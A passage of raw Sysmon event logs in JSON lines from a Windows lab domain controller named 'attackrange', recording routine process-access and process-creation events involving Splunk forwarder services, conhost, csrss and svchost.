{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3485,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.664\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-001059760500}\r\nSourceProcessId: 4140\r\nSourceThreadId: 4232\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00107D770500}\r\nTargetProcessId: 4204\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.664","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-001059760500}","SourceProcessId":"4140","SourceThreadId":"4232","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00107D770500}","TargetProcessId":"4204","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3486,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.664\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 936\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.664","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"936","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3487,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.664\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nTargetProcessId: 3336\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.664","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","TargetProcessId":"3336","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3488,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.680\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.680","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3489,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.688\r\nProcessGuid: {E2A3D6B1-1103-5F25-0000-0010DF790500}\r\nProcessId: 4400\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal_extra_splunkd_service_args\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.688","ProcessGuid":"{E2A3D6B1-1103-5F25-0000-0010DF790500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal_extra_splunkd_service_args","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3490,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.680\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 4372\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-0010DF790500}\r\nTargetProcessId: 4400\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7d48|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.680","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"4372","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010DF790500}","TargetProcessId":"4400","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7d48|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3491,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.680\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-0010DF790500}\r\nTargetProcessId: 4400\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.680","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010DF790500}","TargetProcessId":"4400","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3492,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.680\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.680","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3493,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.680\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.680","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3494,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.680\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.680","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+5